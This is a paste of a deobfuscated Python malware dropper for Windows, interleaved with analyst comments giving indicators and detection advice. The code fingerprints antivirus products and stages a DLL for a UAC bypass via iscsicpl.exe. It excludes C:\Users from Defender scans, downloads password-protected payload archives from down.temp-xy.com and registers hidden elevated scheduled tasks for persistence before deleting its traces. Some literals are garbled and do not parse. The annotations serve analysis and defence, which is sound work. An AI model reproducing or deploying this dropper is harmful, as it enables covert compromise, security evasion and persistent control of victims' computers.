
maintaindown decrypted

a guest
Aug 14th, 2025
Python 12.23 KB | Cybersecurity | 0 0
  1. import os
  2. import sys
  3. import ctypes
  4. import shutil
  5. import time
  6. import zipfile
  7. import urllib.request
  8. import subprocess
  9. import requests
  10. import tempfile
  11. import getpass
  12. import base64
  13.  
  14.  
  15. def _c_(εSQΙSεBQ_: str) ->str:
          # Analyst note: string de-obfuscation helper for literals shaped as
          # 'x' + <decoder digit> + <round-count digit> + <payload>.
          # Anything that is not a str starting with 'x' is returned unchanged.
          # Example taken from this listing: 'x21VHJlbmQgTWljcm8=' selects
          # decoder 2 (base64), one round, and decodes to 'Trend Micro'.
  16.     try:
  17.         if not isinstance(εSQΙSεBQ_, str) or not εSQΙSεBQ_.startswith('x'):
  18.             return εSQΙSεBQ_
          # Character 1 picks the decoder (1-based); character 2 is the number
          # of decoding rounds; the remainder is the encoded payload.
  19.         Ι5βQ25_0 = int(εSQΙSεBQ_[1:2])
  20.         τρβ_0ZΙΟ = int(εSQΙSεBQ_[2:3])
  21.         τε_βΙΙO_ = εSQΙSεBQ_[3:]
          # Decoders in list order: base85, base64, and base64 with the first
          # 16 decoded bytes dropped before UTF-8 decoding.
  22.         Τι8ει_Τ_S5 = [lambda data: base64.b85decode(data.encode('utf-8')).
  23.             decode('utf-8'), lambda data: base64.b64decode(data.encode(
  24.             'utf-8')).decode('utf-8'), lambda data: base64.b64decode(data.
  25.             encode('utf-8'))[16:].decode('utf-8')]
          # The selector is clamped to the last decoder. A selector digit of 0
          # produces index -1, which also addresses the last list entry.
  26.         Ο8QΤ_0ΤΟεΒΡ_B = min(Ι5βQ25_0 - 1, len(Τι8ει_Τ_S5) - 1)
  27.         ΟΕ_QιΤιιΤΕ5O_02 = τε_βΙΙO_
  28.         for _ in range(τρβ_0ZΙΟ):
  29.             ΟΕ_QιΤιιΤΕ5O_02 = Τι8ει_Τ_S5[Ο8QΤ_0ΤΟεΒΡ_B](ΟΕ_QιΤιιΤΕ5O_02)
  30.         return ΟΕ_QιΤιιΤΕ5O_02
          # Any failure (non-digit header, bad padding, invalid UTF-8) falls
          # back to returning the input string untouched.
  31.     except Exception as e:
  32.         return εSQΙSεBQ_
  33.  
  34.  
  35. βΤΙ2τΡ = getpass.getuser()  # current user name; spliced into the per-user paths and the scheduled-task principal further down
  36.  
  37. def Τ1O_Τεβιο_2Ο():
          # Analyst note: security-product fingerprinting. Each directory name
          # under C:\Program Files is compared, case-insensitively, against the
          # vendor list below. The first vendor name found as a substring of a
          # directory name is returned; None is returned when nothing matches.
          # The two _c_() entries decode to 'Trend Micro' and 'Cylance'.
          # The only use of the return value in this listing is the equality
          # test against 'Windows Defender' in the elevated branch.
          # NOTE(review): the result depends on os.listdir() order, so on a
          # host with several products only one of them is reported.
  38.     QΕο_OQlΤ = 'C:\Program Files'
  39.     SZQΒQ8_ΕΤ_5 = ['Avast', 'AVG', 'Bitdefender', 'Kaspersky', 'McAfee',
  40.         'Norton', 'Sophos', 'ESET', 'Malwarebytes', 'Avira', 'Panda', _c_
  41.         ('x21VHJlbmQgTWljcm8='), 'F-Secure', 'Comodo',
  42.         'BullGuard', '360 Total Security', 'Ad-Aware', 'Dr.Web', 'G-Data', 'Vipre', 'ClamWin', 'ZoneAlarm', _c_
  43.         ('x21Q3lsYW5jZQ=='), 'Webroot', 'Palo Alto Networks', 'Symantec', 'SentinelOne', 'CrowdStrike', 'Emsisoft', 'HitmanPro', 'Fortinet',
  44.         'FireEye', 'Zemana', 'Windows Defender']
  45.     for BBlBIροΟ in os.listdir(QΕο_OQlΤ):
  46.         Β1ΙΤ2ι_0ΕΕΙBτΡ = os.path.join(QΕο_OQlΤ, BBlBIροΟ)
  47.         if os.path.isdir(Β1ΙΤ2ι_0ΕΕΙBτΡ):
  48.             for Ι2IβQ1_5_ in SZQΒQ8_ΕΤ_5:
  49.                 if Ι2IβQ1_5_.lower() in BBlBIροΟ.lower():
  50.                     return Ι2IβQ1_5_
  51.     return None
  52.  
  53.  
  54. ρρlΕΒ_ε_2οISΙΡ = 3  # compared with GetDriveTypeW() results in the function below; 3 is DRIVE_FIXED in the Win32 API
  55.  
  56.  
  57. def ρS_0ΕοοΟΟ8ιΟ():
          # Analyst note: environment check. Reads the GetLogicalDrives()
          # bitmask, walks drive letters C..Z, and collects the roots whose
          # GetDriveTypeW() result equals the module-level constant 3.
          # The process exits with status 1 when fewer than two such drives
          # are present; otherwise the function returns None.
          # NOTE(review): this looks like a sandbox/VM heuristic (analysis
          # images often expose a single fixed disk) - inferred, not stated.
          # No call to this function appears anywhere in this listing.
  58.     ΒlΙOΤΟτΙ2_SΕ8 = ctypes.windll.kernel32.GetLogicalDrives()
  59.     QρZο5I = []
  60.     for ΒOl58II_ in 'CDEFGHIJKLMNOPQRSTUVWXYZ':
          # Bit (letter - 'A') of the mask is set when that drive letter exists.
  61.         if ΒlΙOΤΟτΙ2_SΕ8 & 1 << ord(ΒOl58II_) - ord('A'):
  62.             Sοι_ΟQ5QQQΡ = str(ΒOl58II_) + ':\\'
  63.             τεερββlΤ_BΕ = ctypes.windll.kernel32.GetDriveTypeW(Sοι_ΟQ5QQQΡ)
  64.             if τεερββlΤ_BΕ == ρρlΕΒ_ε_2οISΙΡ:
  65.                 QρZο5I.append(Sοι_ΟQ5QQQΡ)
  66.     if len(QρZο5I) < 2:
  67.         sys.exit(1)
  68.  
  69.  
  70.  
  71.  
  72.  
  73. def Q15Q0lIρΙlBει():
          # Analyst note: privilege check. Returns whatever
          # shell32.IsUserAnAdmin() reports; any exception yields False.
          # The result selects between the two top-level branches later in
          # the listing (non-elevated staging vs. elevated install).
  74.     try:
  75.         return ctypes.windll.shell32.IsUserAnAdmin()
  76.     except:
  77.         return False
  78.  
  79.  
  80. QβS_Βι_S_ρρ_QΤρΙ0 = Q15Q0lIρΙlBει()  # elevation flag; selects the non-admin or admin branch further down
      # Per-user WindowsApps directory; the non-admin branch moves ISCSIEXE.dll
      # into it and the cleanup batch file later deletes that DLL from it.
      # NOTE(review): as pasted, the backslashes in this literal are unescaped
      # and the line does not parse - presumably an artifact of the decode or
      # paste step. Read it as the intended path, not as runnable source.
  81. IIΤ8Q1_O = 'C:\Users\' + str(βΤΙ2τΡ) + '\AppData\Local\Microsoft\WindowsApps'
  82. if not os.path.isdir(IIΤ8Q1_O):
          # Quits silently when that directory does not exist.
  83.    sys.exit(0)
      # Directory holding this script; python37.dll and ISCSIEXE.dll are
      # looked up relative to it below.
  84. τεΡ_IΡΙΤ_ = os.path.dirname(os.path.abspath(__file__))
  85.  
  86.  
  87. def ΕεΤ_OZΡBΕβρΙ(ι80QSΟ01_, l1ιΤ_0Τ, βε_20_ΙοOI=2, ΡΒ51ΤοΤ_=30):
         # Analyst note: download helper. Fetches the URL given as the first
         # argument into the file path given as the second, with a retry count
         # (default 2) and a timeout passed to the HTTP calls (default 30).
         # Returns True when the number of bytes written equals Content-Length,
         # or when no Content-Length was reported; returns False otherwise.
         # Nothing here verifies a hash or signature of the downloaded file.
         # The fixed Chrome 91 User-Agent and header set below are usable as a
         # network indicator when hunting for this sample in proxy logs.
  88.    time.sleep(2)
  89.    OlΡ_οl_ρ_S0Ο_ρτρ = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'Accept': '*/*', 'Accept-Language': 'en-US,en;q=0.9', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive'}
         # First pass: urllib.request. The module is imported unconditionally
         # at the top of the file, so this test is always true.
  90.    if urllib is not None:
  91.        for B8_Oτ_O08Ρ_Τ0ι in range(βε_20_ΙοOI):
  92.            try:
  93.                B05βοβΤΙ_ZSI = urllib.request.Request(ι80QSΟ01_, headers=
  94.                    OlΡ_οl_ρ_S0Ο_ρτρ)
  95.                with urllib.request.urlopen(B05βοβΤΙ_ZSI, timeout=ΡΒ51ΤοΤ_
  96.                    ) as ΕO_Ο215:
  97.                    Iι_β_ε5QοΒ = int(ΕO_Ο215.getheader('Content-Length', 0))
  98.                    ρερSΙΟιΟ5Ι_ = 0
  99.                    with open(l1ιΤ_0Τ, 'wb') as βOO_1_OZ1:
  100.                        while True:
  101.                            β5QZ_ΡρρΕΒεII2 = ΕO_Ο215.read(8192)
  102.                            if not β5QZ_ΡρρΕΒεII2:
  103.                                break
  104.                            βOO_1_OZ1.write(β5QZ_ΡρρΕΒεII2)
  105.                            ρερSΙΟιΟ5Ι_ += len(β5QZ_ΡρρΕΒεII2)
  106.                    if Iι_β_ε5QοΒ == 0 or ρερSΙΟιΟ5Ι_ == Iι_β_ε5QοΒ:
  107.                        return True
         # URLError/HTTPError: retry, and after the last attempt fall through
         # to the requests-based pass below.
  108.            except (urllib.error.URLError, urllib.error.HTTPError) as e:
  109.                if B8_Oτ_O08Ρ_Τ0ι == βε_20_ΙοOI - 1:
  110.                    break
  111.                continue
         # Second pass: the same transfer through requests with stream=True,
         # overwriting the same destination file.
  112.    for B8_Oτ_O08Ρ_Τ0ι in range(βε_20_ΙοOI):
  113.        try:
  114.            ΕO_Ο215 = requests.get(ι80QSΟ01_, headers=OlΡ_οl_ρ_S0Ο_ρτρ,
  115.                stream=True, timeout=ΡΒ51ΤοΤ_)
  116.            ΕO_Ο215.raise_for_status()
  117.            Iι_β_ε5QοΒ = int(ΕO_Ο215.headers.get('content-length', 0))
  118.            ρερSΙΟιΟ5Ι_ = 0
  119.            with open(l1ιΤ_0Τ, 'wb') as βOO_1_OZ1:
  120.                for β5QZ_ΡρρΕΒεII2 in ΕO_Ο215.iter_content(chunk_size=8192):
  121.                    if β5QZ_ΡρρΕΒεII2:
  122.                        βOO_1_OZ1.write(β5QZ_ΡρρΕΒεII2)
  123.                        ρερSΙΟιΟ5Ι_ += len(β5QZ_ΡρρΕΒεII2)
  124.            if Iι_β_ε5QοΒ == 0 or ρερSΙΟιΟ5Ι_ == Iι_β_ε5QοΒ:
  125.                return True
  126.        except requests.exceptions.RequestException as e:
  127.            if B8_Oτ_O08Ρ_Τ0ι == βε_20_ΙοOI - 1:
  128.                return False
  129.            continue
  130.    return False
  131.  
  132.  
  133. if not os.path.isfile(os.path.join(τεΡ_IΡΙΤ_, 'python37.dll')):
          # Analyst note: execution guardrail. When python37.dll is not present
          # beside the script, the process idles for one hour and then exits
          # without touching the system.
          # NOTE(review): presumably the script ships with an embedded Python
          # 3.7 runtime, so a copy detonated on its own never reaches the
          # branches below - confirm against the full package. Sandbox runs
          # shorter than the sleep will record no behaviour at all.
  134.    time.sleep(60 * 60)
  135.    sys.exit(0)
  136. if not QβS_Βι_S_ρρ_QΤρΙ0:
          # Analyst note: non-elevated branch. It stages files and launches a
          # Windows binary; no network activity happens in this branch.
          # NOTE(review): moving ISCSIEXE.dll into the user's WindowsApps folder
          # and then starting SysWOW64\iscsicpl.exe is consistent with DLL
          # search-order hijacking of an auto-elevating binary (MITRE ATT&CK
          # T1548.002 / T1574.001). This is inferred from the file names; the
          # DLL itself is not on this page.
          # Detection: ISCSIEXE.dll written under ...\Microsoft\WindowsApps,
          # iscsicpl.exe loading a DLL from a user-writable path, and a
          # runs.vbs file created in %TEMP%.
          # svpy.exe and maintaindown.py are expected next to this script.
  137.    τ1llZ_I_0_Ι = os.path.dirname(os.path.abspath(__file__))
  138.    οι0lοεε8τ1ι8 = os.path.join(τ1llZ_I_0_Ι, 'svpy.exe')
  139.    Οβ0βροΕQΟlο_ = os.path.join(τ1llZ_I_0_Ι, 'maintaindown.py')
  140.    ΙQΤβ_ρρτο_ = os.getenv('TEMP')
  141.    ιρl2Τ0_ = os.path.join(ΙQΤβ_ρρτο_, 'runs.vbs')
          # runs.vbs relaunches svpy.exe with maintaindown.py via
          # WScript.Shell.Run with window style 0 (hidden). Nothing in this
          # script executes the .vbs; presumably the planted DLL does - not
          # verifiable from this page. The literal below is split across
          # physical lines in the paste and is not valid Python as shown.
  142.    βΡοοτSβΟ5 = 'Set ws = CreateObject("WScript.Shell")
  143. ws.Run """' + str(οι0lοεε8τ1ι8) + '"" ""' + str(Οβ0βροΕQΟlο_) + '""", 0
  144. '
  145.    with open(ιρl2Τ0_, 'w', encoding='utf-8') as QΒΟ_Oβ08Il:
  146.        QΒΟ_Oβ08Il.write(βΡοοτSβΟ5)
  147.    ιΒ_1βΙZΙιε0ο = os.path.join(τεΡ_IΡΙΤ_, 'ISCSIEXE.dll')
  148.    Ρ5_βΒρl_8_IΤ2οο = os.path.join(IIΤ8Q1_O, 'ISCSIEXE.dll')
          # A failed move is swallowed; the launch below is attempted anyway.
  149.    try:
  150.        shutil.move(ιΒ_1βΙZΙιε0ο, Ρ5_βΒρl_8_IΤ2οο)
  151.    except Exception as e:
  152.        pass
  153.    try:
  154.        οZρ_τl_O_οΤ = 'C:\Windows\SysWOW64\iscsicpl.exe'
  155.        os.startfile(οZρ_τl_O_οΤ)
  156.        time.sleep(10)
  157.    except Exception as e:
  158.        pass
          # This instance always ends here; the elevated work is done by a
          # separate process that takes the admin branch.
  159.    sys.exit(0)
  160. if QβS_Βι_S_ρρ_QΤρΙ0:
          # Analyst note: elevated branch. Order of operations: optional
          # Defender exclusion, two archive downloads, extraction, two
          # scheduled tasks for persistence, self-cleanup, then an immediate
          # launch of the first payload.
          # Indicators present on this page: host down.temp-xy.com; files
          # OneDrivePatcher.exe, Guardian.exe, update.py; scheduled-task names
          # SvcPowerGreader and PythonConverter.
  161.    import tempfile
          # Runs only when the fingerprint function returned 'Windows
          # Defender': adds the whole C:\Users\ tree as a Defender scan
          # exclusion. Detection: Add-MpPreference -ExclusionPath in process
          # command-line telemetry; Defender records configuration changes as
          # event ID 5007 in its operational log. Failures are ignored.
  162.    if Τ1O_Τεβιο_2Ο() == 'Windows Defender':
  163.        ρι_B_ΙιΙε_Ο_Ι_SO_Z = 'powershell.exe -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath \"C:\Users\""'
  164.        try:
  165.            subprocess.run(ρι_B_ΙιΙε_Ο_Ι_SO_Z, creationflags=subprocess.
  166.                CREATE_NO_WINDOW)
  167.        except:
  168.            pass
          # Payload archive URLs and the ZIP password shared by both archives.
          # Note the third group of the password reads 'QwEl23' with a
          # lowercase L, not the digit 1.
  169.    τ8Ββ_βΕl_2Q1ε = 'https://down.temp-xy.com/update/onedrive.zip'
  170.    ρlΟΒΤ5ρετΕ = 'https://down.temp-xy.com/update/onedrivetwo.zip'
  171.    βΟΕ_lO_ΕΤΒΒο1_ = b'QwE123QwE123QwEl23QwE123'
          # Two staging directories inside the user's profile, both under
          # Microsoft-named folders. They are created if missing.
  172.    Bρ_1εΤ0 = 'C:\Users\' + str(βΤΙ2τΡ) + '\AppData\Local\Microsoft\OneDrive\setup'
  173.    ZOlρ_οΕ1Ο88I = 'C:\Users\' + str(βΤΙ2τΡ) + '\AppData\Local\Microsoft\Windows\Caches'
  174.    os.makedirs(Bρ_1εΤ0, exist_ok=True)
  175.    os.makedirs(ZOlρ_οΕ1Ο88I, exist_ok=True)
  176.    IεSI0ΤΕ_2οΡ_Ρ = os.path.join(tempfile.gettempdir(), 'update.zip')
  177.    Oι_ΟιΟ_82 = os.path.join(tempfile.gettempdir(), 'update1.zip')
          # Either download failing ends the run with exit status 0.
  178.    if not ΕεΤ_OZΡBΕβρΙ(τ8Ββ_βΕl_2Q1ε, IεSI0ΤΕ_2οΡ_Ρ):
  179.        sys.exit(0)
  180.    if not ΕεΤ_OZΡBΕβρΙ(ρlΟΒΤ5ρετΕ, Oι_ΟιΟ_82):
  181.        sys.exit(0)
          # Each archive is unpacked with the password above into its staging
          # directory; any extraction error also ends the run.
  182.    try:
  183.        with zipfile.ZipFile(IεSI0ΤΕ_2οΡ_Ρ, 'r') as εΤSΟZ_Β_OΕΡ:
  184.            εΤSΟZ_Β_OΕΡ.extractall(Bρ_1εΤ0, pwd=βΟΕ_lO_ΕΤΒΒο1_)
  185.    except Exception:
  186.        sys.exit(0)
  187.    try:
  188.        with zipfile.ZipFile(Oι_ΟιΟ_82, 'r') as εΤSΟZ_Β_OΕΡ:
  189.            εΤSΟZ_Β_OΕΡ.extractall(ZOlρ_οΕ1Ο88I, pwd=βΟΕ_lO_ΕΤΒΒο1_)
  190.    except Exception:
  191.        sys.exit(0)
          # The downloaded archives are removed from the temp directory, so
          # update.zip / update1.zip may be absent at triage time.
  192.    try:
  193.        os.remove(IεSI0ΤΕ_2οΡ_Ρ)
  194.        os.remove(Oι_ΟιΟ_82)
  195.    except:
  196.        pass
          # Task names, payload paths and task folders used for persistence.
  197.    S5ε1Ε5 = 'SvcPowerGreader'
  198.    Οο8Ι_ΤB_οΡι = 'PythonConverter'
  199.    οZρ_τl_O_οΤ = os.path.join(Bρ_1εΤ0, 'OneDrivePatcher.exe')
  200.    QZΤ_β8_Ο51ιB = os.path.join(ZOlρ_οΕ1Ο88I, 'Guardian.exe')
  201.    οι0lοεε8τ1ι8 = os.path.join(ZOlρ_οΕ1Ο88I, 'update.py')
  202.    lSQ_ρρΕΤε_l_β50 = Bρ_1εΤ0
  203.    Oτ8Τ_ΤΕρ_1Ο_I_8_ = ZOlρ_οΕ1Ο88I
  204.    ε8Zε2Ol_τοZ = '\Microsoft\Windows\SoftwareProtectionPlatform'
  205.    ΕΒ1_ε5_ΙΒοBI_Β_εQ = '\Microsoft\Windows\AppID'
          # First PowerShell script: registers task SvcPowerGreader under
          # \Microsoft\Windows\SoftwareProtectionPlatform, running
          # OneDrivePatcher.exe at startup with a PT13M delay, RunLevel
          # Highest, for the current user, with -Force.
          # The quoting of this multi-line literal is garbled in the paste.
  206.    BQΕS2βΡ = '
  207.     try {
  208.         $action = New-ScheduledTaskAction -Execute '' + str(οZρ_τl_O_οΤ) + '' -WorkingDirectory '' + str(
  209.         lSQ_ρρΕΤε_l_β50) + ''
  210.         $trigger = New-ScheduledTaskTrigger -AtStartup
  211.         $trigger.Delay = 'PT13M'  # 13 minutes delay after startup
  212.         $settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable
  213.         $principal = New-ScheduledTaskPrincipal -UserId '' + str(βΤΙ2τΡ) + '' -LogonType Interactive -RunLevel Highest
  214.         Register-ScheduledTask -TaskName '' + str(S5ε1Ε5) + '' -TaskPath '' + str(ε8Zε2Ol_τοZ
  215.         ) + '' -Action $action -Trigger $trigger -Settings $settings -Principal $principal -Force
  216.         Write-Output 'Task created successfully.'
  217.     } catch {
  218.         Write-Error $_.Exception.Message
  219.     }
  220.     '
          # Second PowerShell script: registers task PythonConverter with a
          # PT20M startup delay and an -Argument of the update.py path.
          # NOTE(review): the identifiers on paste lines 223 and 231 are spelled
          # differently from the ones assigned on lines 200 and 205; presumably
          # they stand for the Guardian.exe path and the \Microsoft\Windows\AppID
          # task folder. Treat this listing as a lossy decode.
  221.    Oι_β_ρει8Z1Ιββ = '
  222.     try {
  223.         $action = New-ScheduledTaskAction -Execute '' + str(QZΤ_β851ιB) + '' -Argument '' + str(
  224.         οι0lοεε8τ1ι8) + '' -WorkingDirectory '' + str(
  225.         Oτ8Τ_ΤΕρ_1Ο_I_8_) + ''
  226.         $trigger = New-ScheduledTaskTrigger -AtStartup
  227.         $trigger.Delay = 'PT20M'  # 20 minutes delay after startup
  228.         $settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable
  229.         $principal = New-ScheduledTaskPrincipal -UserId '' + str(βΤΙ2τΡ) + '' -LogonType Interactive -RunLevel Highest
  230.         Register-ScheduledTask -TaskName '' + str(Οο8Ι_ΤB_οΡι) + '' -TaskPath '' + str(
  231.         ΕΒ15_ΙΒοBI_Β_εQ) + '' -Action $action -Trigger $trigger -Settings $settings -Principal $principal -Force
  232.         Write-Output 'Task created successfully.'
  233.     } catch {
  234.         Write-Error $_.Exception.Message
  235.     }
  236.     '
          # Both scripts run through powershell.exe with -ExecutionPolicy
          # Bypass, -NoProfile and -WindowStyle Hidden, with no console window.
          # The return code is read, but every outcome only sleeps, so a
          # failed registration is not handled or reported.
          # Detection: hidden PowerShell with Register-ScheduledTask on the
          # command line, and new tasks under the two task folders above
          # (Security event 4698 where task-creation auditing is enabled).
  237.    try:
  238.        ρτ_SοΟSΡ5ο = subprocess.run(['powershell.exe', '-ExecutionPolicy', 'Bypass', '-NoProfile', '-WindowStyle', 'Hidden', '-Command', BQΕS2βΡ], check=False,
  239.            stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True,
  240.            creationflags=subprocess.CREATE_NO_WINDOW)
  241.        if ρτ_SοΟSΡ5ο.returncode == 0:
  242.            time.sleep(5)
  243.        else:
  244.            time.sleep(5)
  245.    except Exception as e:
  246.        time.sleep(5)
  247.    try:
  248.        ρτ_SοΟSΡ5ο = subprocess.run(['powershell.exe', '-ExecutionPolicy', 'Bypass', '-NoProfile', '-WindowStyle', 'Hidden', '-Command', Oι_β_ρει8Z1Ιββ], check=
  249.            False, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=
  250.            True, creationflags=subprocess.CREATE_NO_WINDOW)
  251.        if ρτ_SοΟSΡ5ο.returncode == 0:
  252.            time.sleep(2)
  253.        else:
  254.            time.sleep(2)
  255.    except Exception as e:
  256.        time.sleep(2)
          # Self-cleanup: del_temp.bat waits 10 seconds, then deletes
          # ISCSIEXE.dll from WindowsApps, %TEMP%\runs.vbs, the running script
          # (sys.argv[0]) and finally the batch file itself.
          # Forensics: those staging artifacts may be gone by triage time; the
          # scheduled tasks and the two staging directories are what remains.
  257.    βΕρ0BZεΡ_ΡOε = os.path.join(tempfile.gettempdir(), 'del_temp.bat')
  258.    with open(βΕρ0BZεΡ_ΡOε, 'w', encoding='utf-8') as QΒΟ_Oβ08Il:
  259.        QΒΟ_Oβ08Il.write('@echo off
  260. timeout /t 10 /nobreak >nul
  261. del /f /q "' + str(os.path.join(IIΤ8Q1_O, 'ISCSIEXE.dll')) + '"
  262. del /f /q "%TEMP%\runs.vbs"
  263. del /f /q "' +
  264.            str(os.path.abspath(sys.argv[0])) + '"
  265. del /f /q "%~f0"
  266. ')
  267.    subprocess.Popen(['cmd', '/c', βΕρ0BZεΡ_ΡOε], creationflags=
  268.        subprocess.CREATE_NO_WINDOW)
          # OneDrivePatcher.exe is also started immediately, without waiting
          # for the startup-triggered task.
  269.    os.startfile(οZρ_τl_O_οΤ)
  270.    time.sleep(5)
  271. sys.exit(0)
  272.  